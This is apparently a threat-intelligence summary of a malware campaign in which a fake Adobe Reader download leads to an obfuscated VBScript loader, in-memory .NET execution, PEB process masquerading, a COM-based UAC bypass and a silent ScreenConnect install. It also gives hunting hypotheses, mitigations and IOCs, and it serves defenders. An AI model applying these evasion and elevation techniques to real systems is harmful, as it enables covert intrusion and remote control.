Skip to content
.ca
sign in
5 minhigh

In-Memory Loader Drops ScreenConnect | ThreatLabz

Attackers are utilizing a fake Adobe Acrobat Reader lure to deploy a highly obfuscated VBScript loader that executes a .NET payload entirely in-memory. The attack chain leverages PEB manipulation for process masquerading and abuses auto-elevated COM objects to bypass UAC, ultimately installing the legitimate ScreenConnect remote access tool for malicious purposes.

Conf:highAnalyzed:2026-04-09reports

Authors: KAIVALYA KHURSALE

PEB ManipulationIn-Memory LoaderScreenConnectVBScriptUAC Bypass

Source:Zscaler ThreatLabz

IOCs · 2

Key Takeaways

  • Attack chain uses heavy obfuscation and direct in-memory execution to deploy the legitimate ScreenConnect RMM tool.
  • Uses .NET reflection to keep payloads in memory, evading signature-based defenses and hindering forensic examination.
  • A VBScript loader dynamically reconstructs strings and objects at runtime to defeat static analysis.
  • Auto-elevated COM objects are abused to bypass UAC and run with elevated privileges without user prompts.
  • Process Environment Block (PEB) manipulation is used to masquerade the loader's running Windows process to avoid EDR alerts.

Affected Systems

  • Windows

Attack Chain

The attack begins with a fake Adobe Acrobat Reader download that delivers an obfuscated VBScript loader. This script dynamically constructs objects to launch PowerShell, which downloads and compiles a C# payload entirely in-memory using .NET reflection. The in-memory loader retrieves the PEB to perform process masquerading as winhlp32.exe and bypasses UAC via auto-elevated COM objects. Finally, it downloads and silently installs the ScreenConnect remote access tool via msiexec.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

The article does not provide any pre-built detection rules or queries.

Detection Engineering Assessment

EDR Visibility: Medium — In-memory execution and PEB manipulation can evade some user-mode hooks, but the initial PowerShell compilation (Add-Type) and msiexec spawning are highly visible to modern EDRs. Network Visibility: Medium — Downloads occur from Google Drive and a short-link service (x0.at), which are generally encrypted via HTTPS, limiting deep packet inspection, but the domain connections are visible. Detection Difficulty: Hard — Heavy obfuscation, in-memory execution, and the use of legitimate RMM tools (ScreenConnect) make distinguishing malicious activity from legitimate administrative tasks difficult.

Required Log Sources

  • Process Creation (Event ID 4688)
  • PowerShell Script Block Logging (Event ID 4104)
  • File Creation (Event ID 11)

Hunting Hypotheses

HypothesisTelemetryATT&CK StageFP Risk
Look for PowerShell executing Add-Type with -ReferencedAssemblies shortly after downloading a file via curl.exe or Invoke-WebRequest.Process Creation, PowerShell Script Block LoggingExecutionMedium
Monitor for msiexec.exe installing ScreenConnect originating from unusual parent processes or temporary directories like C:\Temp.Process CreationExecutionLow
Hunt for processes masquerading as winhlp32.exe but lacking the expected Microsoft digital signature or originating from unexpected paths.Process Creation, File MetadataDefense EvasionLow
Identify wscript.exe or cscript.exe spawning powershell.exe with the -ExecutionPolicy Bypass flag.Process CreationExecutionMedium

Control Gaps

  • Lack of strict application control for RMM tools
  • Insufficient PowerShell execution policy enforcement

Key Behavioral Indicators

  • PowerShell compiling C# in-memory via Add-Type
  • VBScript dynamically constructing WScript.Shell
  • COM object elevation monikers used by unexpected processes

False Positive Assessment

  • Medium

Recommendations

Immediate Mitigation

  • Block access to the known malicious URLs (x0[.]at and the specific Google Drive link).
  • Search endpoints for the presence of Acrobat_Reader_V112_6971.vbs or unauthorized ScreenConnect installations.

Infrastructure Hardening

  • Restrict the execution of VBScript and PowerShell scripts using AppLocker or Windows Defender Application Control (WDAC).
  • Implement strict controls and monitoring around the installation and execution of Remote Monitoring and Management (RMM) tools.

User Protection

  • Ensure EDR solutions are configured to monitor for in-memory .NET reflection and PEB manipulation.
  • Enforce strict UAC settings and monitor for COM object abuse.

Security Awareness

  • Train users to identify fake software update lures, particularly for common applications like Adobe Acrobat Reader.

MITRE ATT&CK Mapping

  • T1059.005 - Command and Scripting Interpreter: Visual Basic
  • T1059.001 - Command and Scripting Interpreter: PowerShell
  • T1620 - Reflective Code Loading
  • T1036.005 - Masquerading: Match Legitimate Name or Location
  • T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
  • T1219 - Remote Access Software
  • T1105 - Ingress Tool Transfer
  • T1027 - Obfuscated Files or Information

Additional IOCs

  • File Paths:
    • C:\Windows\Temp\FileR.txt - Temporary file path where the downloaded C# source code is stored before in-memory compilation.
    • C:\Windows\winhlp32.exe - Legitimate Windows binary path used for process masquerading via PEB manipulation.
    • C:\Temp - Directory created by the final stage PowerShell script to store the downloaded ScreenConnect MSI.
  • Command Lines:
    • Purpose: Downloads a text file containing C# source code and compiles it in-memory using .NET reflection. | Tools: powershell.exe, curl.exe | Stage: Execution/Defense Evasion
    • Purpose: Installs the downloaded ScreenConnect MSI payload. | Tools: msiexec.exe | Stage: Execution/Persistence | msiexec /i ScreenConnect.ClientSetup.msi

Related